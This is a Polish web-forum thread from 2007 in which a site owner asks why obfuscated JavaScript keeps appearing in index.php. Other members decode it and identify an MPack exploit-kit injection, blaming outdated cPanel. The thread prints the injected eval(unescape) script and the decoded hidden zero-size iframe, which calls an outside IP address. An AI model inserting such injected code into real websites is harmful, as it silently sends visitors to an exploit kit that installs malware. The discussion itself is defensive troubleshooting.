Dziwny błąd ? Czyżby włamanie ? Opcje

[Rafiki23]

Witam,

od kilkinastu dni, przeważnie raz dziennie jestem zmuszony nadpisywać plik index.php, gdyż nie ładuje sie cała strona. Po zobaczeniu kodu źródłowego strony w Mozilli lub IE widzę dziwny kod :

[HTML] pobierz, plaintext 
<script type="text/javascript" language="JavaScript">
eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%69%66%72%61%6D%65%20%73%72%63%3D%5C%22%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%35%30%2E%38%32%2F%6D%70%61%63%6B%2F%69%6E%64%65%78%2E%70%68%70%5C%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%73%74%79%6C%65%3D%5C%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%5C%22%3E%3C%2F%69%66%72%61%6D%65%3E%22%29%3B%0D%0A%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%22%20%22%3B"));
</script>
[HTML] pobierz, plaintext 

Co może być problemem, że taki kod zostaje mi co jakiś czas "dopisany"?

[delfinium]

Nie wiem czy to włam czy nie. cokolwiek się dzieje dopisuje Ci do strony coś takiego:

[HTML] pobierz, plaintext 
<iframe src="http://81.95.150.82/mpack/index.php" style="" height="0" width="0"></iframe>
[HTML] pobierz, plaintext 

Whois podaje, że to adres holenderski:

[HTML] pobierz, plaintext 
OrgName:    RIPE Network Coordination Centre 
OrgID:      RIPE
Address:    P.O. Box 10096
City:       Amsterdam
StateProv:  
PostalCode: 1001EB
Country:    NL
[HTML] pobierz, plaintext 

a sama strona przekierowuje na główną stronę Yahoo (IMG:http://forum.php.pl/style_emoticons/default/biggrin.gif) Nie używasz czasem jakiegoś skryptu co sam Ci nadpisuje index.php?

[Rafiki23]

Whois podaje, że to adres holenderski:

[HTML] pobierz, plaintext 
OrgName:    RIPE Network Coordination Centre 
OrgID:      RIPE
Address:    P.O. Box 10096
City:       Amsterdam
StateProv:  
PostalCode: 1001EB
Country:    NL
[HTML] pobierz, plaintext 

a sama strona przekierowuje na główną stronę Yahoo (IMG:http://forum.php.pl/style_emoticons/default/biggrin.gif) Nie używasz czasem jakiegoś skryptu co sam Ci nadpisuje index.php?

Mam hosting na webd.pl a z tego co wiem, to oni mają chyba serwery w Holandii. Nie używam żadnego skryptu co mi nadpisuje index.php.

Co mogę zrobić, by mi nie dopisywało tego kodu?

[danek]

Koleś czy ty nie wiesz co to mpack?
TO najlepszy system włamań oparty na php.
Podobno on idzie za 1000$ w Ruskim podziemiu hackerskim.

http://www.heise-online.pl/news/item/277

Zmień hasła do swoich serwerów bo aby przeprowadzić taki atak ktoś musi umieścić ramke iframe na twojej stronie

Ten post edytował danek 13.07.2007, 20:53:52

[delfinium]

Nic dodać. Pytanie tylko skąd ten kod bierze się u Ciebie na stronie? Używasz cPanel?

[danek]

Jak mówi delfinium cPanel w starszych wersjach jest podatny na ataki mpack

[Rafiki23]

Nic dodać. Pytanie tylko skąd ten kod bierze się u Ciebie na stronie? Używasz cPanel?

Tak, cPanel zainstalowany jest na serwerach webd.pl.

[Blodo]

Warto powiadomic adminow zeby zrobili upgrade cpanela do wersji 10, o ile jeszcze tego nie zrobili.

[LonelyKnight]

Podobne zapisy JS (ale akurat nie takie) spotkałem na dwóch stronach hostujących się w home.pl W tych przypadkach był to trojan downloader.

Temat: Problemy z Homepl